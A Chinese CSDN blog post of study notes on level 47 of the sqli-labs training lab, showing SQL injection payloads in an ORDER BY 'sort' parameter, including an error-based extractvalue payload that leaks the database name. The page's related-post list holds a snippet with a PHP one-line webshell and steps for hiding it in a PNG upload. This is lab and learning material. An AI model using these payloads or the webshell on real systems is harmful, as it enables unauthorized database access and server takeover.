sqllab第四十七关通关笔记

最新推荐文章于 2024-07-25 14:12:59 发布
最新推荐文章于 2024-07-25 14:12:59 发布
阅读量343 收藏
点赞数 3
文章标签: 笔记 sqllab
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/I_WORM/article/details/136794734
版权
本文探讨了一次在Web应用程序中检测到的字符型注入漏洞,通过实验展示了如何利用`orderby`位置进行攻击,尝试单引号绕过失败后,成功实现了错误注入并获取了数据库名。
摘要由CSDN通过智能技术生成

知识点:

  • 错误注入
  • 字符型注入
  • order by 位置注入
    • 报错注入
    • 时间盲注

通过测试发现是一个字符型注入

构造payload:sort=2'               报错了

构造payload:sort=2''              不提示报错了

说明这里存在字符型注入

尝试进行单引号绕过

构造payload:sort=2'and 1='1

这里其实and后面的没起到作用,整体也没作用感觉,内容顺序没变过

直接进行错误注入

构造payload:sort=2'and extractvalue(1,concat(0x7e,database(),0x7e))='1

成功获取到了数据库名

10

I_WORM
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
DVWA 共12通关笔记
09-12
【DVWA 共12通关笔记】 DVWA(Damn Vulnerable Web Application)是一个用于网络安全教育的开源Web应用程序。它包含各种安全漏洞,为初学者和专业人士提供了实践和学习Web安全漏洞的机会。DVWA分为多个级别,从低...
愤怒的小鸟水煮蛋1-15通关录像.mp4
05-13
愤怒的小鸟水煮蛋1-15通关录像
SQL-Labs靶场“46-50”通关教程
热门推荐
钟言的博客
02-24 1万+
本篇为SQL-Labs靶场的第46到50教程,详细内容包含了:四十六 ORDER BY数字型注入 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注 5、报错注入 6、Limit注入 四十七 ORDER BY单引号报错注入 1、源码分析 2、报错注入 3、时间盲注 三、四十八 ODRER BY数字型盲注 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注 四、四十九 ORDER BY单引号盲注1、源码分析 2、时间盲注 五、五十 ORDER BY数字型堆叠注等
sqli-labs/Less-47
m0_71299382的博客
11-22 165
sqli-labs第四十七
sql-lab 41-65通关秘籍
weixin_46329549的博客
04-19 198
Less-41 41和40相同,相步骤查看上篇博客。 Less-42 这一通过查看源代码发现是对用户名进行了过滤,所以应该在password处进行注入,单引号错误。 Less-43 和42相同不过是单引号加括号错误。 Less-44 同上,但是没有回显,单引号错误。 Less-45 同上,没有回显,单引号加括号型错误。 Less-46 从本题开始利用order by进行注入,对id进行降...
sqli-labs————Less-47(procedure alalyse\lines terminated by利用)
Fly_鹏程万里
05-21 1044
Less-47源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&gt..
sqllab第三通关笔记
I_WORM的博客
03-13 524
发现报错提示中出现了‘)’;说明构造的语句中带有括号信息;同时说明了这是单引号引起的字符型注入。构造payload:id=0') union select 1,2,3 --+成功显示除了输入的内容;下面可以用同样的方法获取数据库等信息。首先通过测试判断存在什么类型的sql注入。说明是字符型的sql注入。好了,下面就测试有什么限制条件。好了,尝试进行联合注入。
sqllab第四通关笔记
I_WORM的博客
03-13 458
构造payload:id=0")+union+select%201,2,3%20--+说明原始语句中对输入的读取格式为 ("输入")好了,既然知道了语法信息,下面就开始注入。说明不是用单引号读取输入内容。回显出现了键信息‘)’默认单引号为字符串信息。
sqllab第十一通关笔记
I_WORM的博客
03-14 900
首先看界面是一个登录框;通过admin admin登录进去,发现页面会把用户名和密码的登录信息打印出来;通过bp抓包进行测试是不是存在注入点。
Sqllab第一通关笔记
I_WORM的博客
03-10 807
知识点:明白数值注入和字符注入的区别联合查询:union 或者 union allconcat()concat_ws(分隔符,字符串)
sqllab第35-45通关笔记
I_WORM的博客
03-18 651
10
松鼠大战1第G通关录像.mp4
09-16
松鼠大战1第G通关录像
松鼠大战1第F通关录像.mp4
09-15
松鼠大战1第F通关录像
松鼠大战1第E通关录像.mp4
09-14
松鼠大战1第E通关录像
deepseek-vl 论文阅读笔记
samoyan的博客,记录技术成长~
07-22 1225
我们的语言模型基于DeepSeek LLM(DeepSeek-AI,2024),其微设计大体遵循LLaMA(Touvron等,2023a,b)的设计,采用带有RMSNorm(Zhang和Sennrich,2019)函数的Pre-Norm结构,并使用SwiGLU(Shazeer,2020)作为前馈网络(FFN)的激活函数,中间层维度为8/3模型维度。此外,我们引入了一种新的“模态预热”策略。为了促进创新并支持广泛的应用需求,我们公开了两个版本的模型,分别为1.3B和7B,以满足不同计算能力的需求。
vite5+vue3开发阅读APP实战笔记20240725
Python私教
07-25 395
修改src/page/home/index.vue,使用组件和API。注意,这里无论是组件还是API,都不需要我们手动引入,我们配置了自动导入以后,vite会帮我们自动导入。创建 src/page/home/index.vue。修改 vite.config.js。修改vite.config.js。修改 src/main.js。修改src/App.vue。
Golang学习笔记20240725,Go语言基础语法
最新发布
Python私教
07-25 532
如果我们在遍历的时候,不想要key或者value,也可以用下划线替代,下划线叫做匿名变量。go语言里面的switch语句每个case天生就是独立的,不需要加break。指针可以直接对内存地址进行操作。使用*表示指针,使用&取地址。切片在go语言里面非常常用,因为其有动态扩展的特性。运行方式3:goland右键运行。使用加号可以对字符串进行拼接。
学习笔记-系统框图传递函数公式推导
weixin_45875994的博客
07-24 799
输出C(s)是前向路径(通过G(s))的输出与反馈路径(通过H(s))的输出之差(在负反馈系统中)。因此,我们可以写出以下系式:这里,G(s)R(s)是前向路径的输出,而G(s)H(s)C(s)是反馈路径的输出(注意,反馈路径的输出先经过H(s),再与前向路径的输出相减)。
upload-labs 第四通关攻略
11-29
为了避免违反规则3,我无法提供upload-labs第四的具体攻略。但是,我可以给你一些提示和指导,帮助你完成这个挑战。 upload-labs是一个专门用于漏洞练习的平台,第四主要是于文件上传漏洞的。在这个挑战中,你需要上传一个png文件,并在其中插入一句话木马。具体步骤如下: 1. 打开上传页面,上传一个png文件。 2. 修改png文件的内容,在开头加入文件幻数检测绕过的png的value值:89 50 4E 47 0D 0A 1A 0A 00。 3. 在png文件的末尾添加一句话木马。你可以使用一些常见的一句话木马,例如:<?php eval($_POST['cmd']); ?> 4. 保存修改后的png文件,并重新上传到服务器。 5. 访问上传的png文件,触发一句话木马。 请注意,这只是一个大致的指导,具体的实现可能会因为upload-labs平台的更新而有所不同。在实际操作中,你需要仔细阅读题目要求和提示,结合自己的知识和经验,不断尝试和调试,才能成功完成这个挑战。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

I_WORM

大佬们,赏点儿碎银吧~~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值